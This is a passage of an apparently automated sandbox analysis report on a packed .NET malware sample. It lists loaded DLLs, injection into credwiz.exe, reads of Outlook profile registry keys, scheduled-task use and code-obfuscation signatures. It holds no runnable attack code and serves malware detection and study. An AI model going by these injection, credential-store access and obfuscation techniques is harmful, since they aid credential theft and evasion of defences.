Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: msctfmonitor.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: msutb.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: eOQl.pdb source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, ygTGgAEg.exe.0.dr
Source: Binary string: credwiz.pdb source: ygTGgAEg.exe, 0000000A.00000002.1947292597.0000000001468000.00000004.00000020.00020000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000003.1883946633.0000000000825000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000005.00000002.1648366255.0000000001680000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2287550496.0000000004430000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2287550496.00000000045CE000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1946839032.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1948941056.000000000427C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000005.00000002.1648366255.0000000001680000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, credwiz.exe, 00000018.00000002.2287550496.0000000004430000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2287550496.00000000045CE000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1946839032.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1948941056.000000000427C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: credwiz.pdbGCTL source: ygTGgAEg.exe, 0000000A.00000002.1947292597.0000000001468000.00000004.00000020.00020000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000003.1883946633.0000000000825000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: eOQl.pdbSHA256 source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, ygTGgAEg.exe.0.dr
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nYPOiVPQBw.exe, 00000017.00000002.2283799476.000000000031F000.00000002.00000001.01000000.0000000E.sdmp, nYPOiVPQBw.exe, 0000001B.00000002.2283165997.000000000031F000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, CF1M1hWBYXYVajyyAa.cs .Net Code: qAELdIrYOW System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, CF1M1hWBYXYVajyyAa.cs .Net Code: qAELdIrYOW System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0041516E push esi; ret 5_2_0041516F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00415183 push edi; ret 5_2_0041519C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00412218 push dword ptr [ecx]; retf 5_2_00412221
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040D29E push ss; iretd 5_2_0040D29F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040AB72 push ds; iretd 5_2_0040AB7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00412BA0 push ss; ret 5_2_00412BA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0041FC40 push ebx; iretd 5_2_0041FC81
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0041FC54 push ebx; iretd 5_2_0041FC81
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00403420 push eax; ret 5_2_00403422
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0041FC84 push ebx; iretd 5_2_0041FC81
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0041AD28 push ebx; retf 5_2_0041AD55
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0041AD33 push ebx; retf 5_2_0041AD55
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040D695 pushfd ; retf 5_2_0040D6A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00414FFB pushfd ; ret 5_2_00414FFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0168225F pushad ; ret 5_2_016827F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016827FA pushad ; ret 5_2_016827F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B09AD push ecx; mov dword ptr [esp], ecx 5_2_016B09B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0168283D push eax; iretd 5_2_01682858
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01681328 push eax; iretd 5_2_01681369
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 6_2_06C48041 push es; ret 6_2_06C4804C
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 6_2_06C4D96B push cs; retf 6_2_06C4D96C
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 6_2_06C4D97A push cs; retf 6_2_06C4D97C
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 10_2_018C1368 push eax; iretd 10_2_018C1369
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 10_2_018F09AD push ecx; mov dword ptr [esp], ecx 10_2_018F09B6
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 10_2_018C1FEC push eax; iretd 10_2_018C1FED
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 10_2_0042E4F7 push 26B90F1Dh; iretd 10_2_0042E4FC
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Code function: 10_2_00418BF3 pushad ; retf 7985h 10_2_00418C56
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Code function: 23_2_026DE25A push edi; ret 23_2_026DE25C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Code function: 23_2_026EBBE8 push esi; ret 23_2_026EBBE9
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Code function: 23_2_026EBBFD push edi; ret 23_2_026EBC16
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Code function: 23_2_026E410F pushfd ; retf 23_2_026E4120
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: section name: .text entropy: 7.778691817164504
Source: ygTGgAEg.exe.0.dr Static PE information: section name: .text entropy: 7.778691817164504
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, UyQ2Wxx13yAJ6tcVgA.cs High entropy of concatenated method names: 'TDWerTWTiV', 'T1Ne4Z3sJW', 'Hste1YDIMv', 'roie69yN6i', 'nVUeWfySDf', 'qB71OwXNdp', 'JjK1TFljLb', 'P0m1DXOa26', 'oUA1pfdSJn', 'xxa19l5oDj'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, sZkl0Daa7b5ipL1yeS.cs High entropy of concatenated method names: 'sa9e2bDAhL', 'bYSe7W3DUe', 'Uhyed9drUK', 'FldeVPQHKu', 'RGteGMq0H9', 'f3BevVELDV', 'qvVetmpa1S', 'ceFen6aDT0', 'E3L5yAtw1nEhfCCfaR2', 'dxqWjJtHM2JivYSOguk'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, ckZ9B3MnQBV2fRSoFq.cs High entropy of concatenated method names: 'pVsdFWFb0', 'h8aVEChl8', 'nBcG28qQm', 'NwovvTYqh', 'JE2th2bZx', 'FmYny2TKX', 'msQhsYPO6yxnTty4SD', 'PHHbh0JlQIyIErVvlj', 's86JhZJf8', 'teFiMWFTt'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, UBQx4X0RsN10kBPFUe.cs High entropy of concatenated method names: 'Rnb6jPphQf', 'EkG6UON0vw', 'QDY6eHEc1g', 'WjqeShTDWs', 'NFKezOKTAD', 'GmC63gbAr6', 'Sws6Y5LCQY', 'jrE6MQa1a3', 'N9T6kOsLEx', 'Ms36Lswx7L'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, qyKI0Knvura3kca2vh.cs High entropy of concatenated method names: 'kJM1EY6oPA', 'woh1vdCdTR', 'R7tUhGC0oB', 'e4nUatLvIx', 'A6KUu8pFlJ', 'X6tUsWOXWc', 'zOPU0c3mM0', 'b08UmXPwDj', 'k35UZXejXW', 'BgoUIbZcPQ'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, T2UBx5zr2iRvvGyuDs.cs High entropy of concatenated method names: 'cGeiGDi84m', 'Rw9iw7sL3F', 'HpQitf3Hmq', 'FfNixGM1xM', 'uONibIlMwt', 'bBSiaOJ0eN', 'AbdiuY9gsc', 'PKGi27Bhmo', 'QaZi7Z9OnP', 'slgiRgSKJ4'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, T5NI6nYkglLhJg4SkyM.cs High entropy of concatenated method names: 'dYtNSB26F5', 'VOkNzga21n', 'mePC3dxL7W', 'Fq7DFUDEdAhxBqHARmt', 'VbIgSqDaJ9Isbf1GrSi', 'HXrUKbD2uWLG2OVBXCs', 'tAh7lRDpVWwvnho5c5i', 'm1NKu3DmYvHwhNKVDtl'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, XSmrMU4xs7MNAa8rL2.cs High entropy of concatenated method names: 'Dispose', 'X5pY9TENfv', 'YRlMbMlVLC', 'lQrn8hplad', 'XIOYSaCCS1', 'd0UYz1f9JX', 'ProcessDialogKey', 'hADM3iNAYO', 'm5fMYJ2EQg', 'OTGMM41OQ6'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, KpYBmac46k96E4aoxF.cs High entropy of concatenated method names: 'f8RBwov2Ga', 'qp5Bt8phs6', 'cCoBxRRLAo', 'moNBbHHRaA', 'NdjBaLmw1Y', 'eH9Bu6WBgF', 'by0B0nb7wD', 'L5gBm2f1fR', 'q13BIRVwsD', 'e3TByOGPE8'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, Yf8CAAYLohmwpY8kPhU.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Aw6ClLgrdb', 'zAOCiNArZg', 'qemCN4TN9b', 'qZFCCBx0iV', 'ahbCfcAfQT', 'PVmCAFroKy', 'pxVC2DkNeI'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, ykI78OTq3ggtyFtb9J.cs High entropy of concatenated method names: 'DklqpdX3vX', 'IEsqSamQmi', 'o2MJ3dOqHX', 'pvPJYLyjKw', 'gDjqykx7EF', 't5RqKovZ7P', 'yJ3qckhb2Y', 'vIjqXgkglC', 'soLq8B5vK8', 'UmHqohK62V'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, l0Aw7Itj2TjiGH84uG.cs High entropy of concatenated method names: 'DMUUVNB12P', 'PnVUGno1DX', 'RqcUwpLMXQ', 'G5hUtafHPh', 'zA5UPMXIiR', 'NQoUHZF06h', 'CqtUqdtHE2', 'jPFUJ9oqjT', 'oDqUlaheIC', 'Vf6Ui88Z9j'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, yqcuSPwxix5wtVSotd.cs High entropy of concatenated method names: 'ld44XnbZ0I', 'Am248LyfnH', 'GgF4osX24w', 'dvR4gUmqGZ', 'Tgu4OVTkKK', 'UIf4T9PBhb', 'ujs4D773Uu', 'TkM4ptG8Hh', 'GJK49p9yJy', 'xKU4S1xqqp'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, g1OQ6aSyC4eyn1XrQQ.cs High entropy of concatenated method names: 'SnniUcjG5W', 'm8Ti1bDPIm', 'IB7iedBwc0', 'JM8i6hwAFW', 'zcAil0LH4I', 'A2IiWDyUfb', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, rlFYxTZS8eL5R1q5jJ.cs High entropy of concatenated method names: 'hG66733DwL', 'I5c6RGNu9H', 'uTx6dICjEk', 'toX6VstyJd', 'CW06E6btux', 'Aq66GWqlUB', 'F9M6vuykJn', 'sMZ6w8r7yO', 'K5r6tVbYAe', 't5j6n0dfjT'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, J7MMyRL66vedbCaEZt.cs High entropy of concatenated method names: 'N1RY6qcuSP', 'FixYW5wtVS', 'Nj2Y5TjiGH', 'R4uYQGqyKI', 'Pa2YPvhOyQ', 'wWxYH13yAJ', 'Jk0AgbzUbQfyuVebuo', 'MQp1JLhe8axRXgNEQIi', 'IDuYYBKcp6', 'O7ZYk9f88o'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, WiNAYO955fJ2EQgyTG.cs High entropy of concatenated method names: 'tohlxQ5pRX', 'Detlbe6FHm', 'D1DlhRDSvd', 'zOTlaQb87B', 'WYgluqdpir', 'vEQlsmCa45', 'Xc1l0P55Nv', 'eRwlmIUwfE', 'UiAlZKMNDF', 'nI0lIYC7Ir'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, IWaBwoY39Vk6HTTRUnF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'krViyTg3Ve', 'yDHiKN0f2o', 'cpbic2jxwp', 'GDQiXxNZhh', 'hSJi81WePc', 'L07ioT4ZwZ', 'wCeigUGfCR'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, N91pXkgSYIBKRdHmWU.cs High entropy of concatenated method names: 'udjq5pqCfb', 'TpxqQ9KCEK', 'ToString', 'de1qjGj6ef', 'YKEq45ASYa', 'LtHqU5xi2u', 'gvcq1k6ZRN', 'Qwbqe2V2Rs', 'S96q6b7rGT', 'VeFqWvCqxW'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, CF1M1hWBYXYVajyyAa.cs High entropy of concatenated method names: 'DDnkrY8HsO', 'Qtykj3sgs9', 'SDOk4N7fEi', 'BLnkUsgmcU', 'U4Ik1JcBiJ', 'tTlkeLaVdn', 'vEMk6v2SB2', 'wWCkWSfsTE', 'hTokFJuRHZ', 'aE9k5w0TvX'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, E1In5iU7bafFedOMuX.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'raIM9EOf7Y', 'bNTMSXJlBl', 'sCyMzFpJ4k', 'GPbk36USNU', 'XZ2kYLCavT', 'xLNkMT45oO', 'HWIkkGsbB0', 'JBYMJvhOHurW58BO1cJ'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, FfiVO3DHCp5pTENfv9.cs High entropy of concatenated method names: 'oT9lPvBsoP', 'gD9lq26xo9', 'EsOllRa0Pb', 'dR5lNREYyY', 'YwllfO964H', 'mjEl2ILqXr', 'Dispose', 'SRbJjcnKeU', 'scnJ4YyP4o', 'DhHJUNPaVJ'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.7440000.7.raw.unpack, X2tlT2YYRVrkg0JDZtA.cs High entropy of concatenated method names: 'PQCiSyBkIc', 'OUDizSIqZC', 'uquN3w02tx', 'hvXNYO7V43', 'Vb0NMKw4vo', 'PcXNkNnvSK', 'vNJNLPMGsD', 'OesNrb5F8K', 'B0YNj3Hk2q', 't8HN4rSskg'
Source: 0.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.40a0128.4.raw.unpack, UyQ2Wxx13yAJ6tcVgA.cs High entropy of concatenated method names: 'TDWerTWTiV', 'T1Ne4Z3sJW', 'Hste1YDIMv', 'roie69yN6i', 'nVUeWfySDf', 'qB71OwXNdp', 'JjK1TFljLb', 'P0m1DXOa26', 'oUA1pfdSJn', 'xxa19l5oDj'
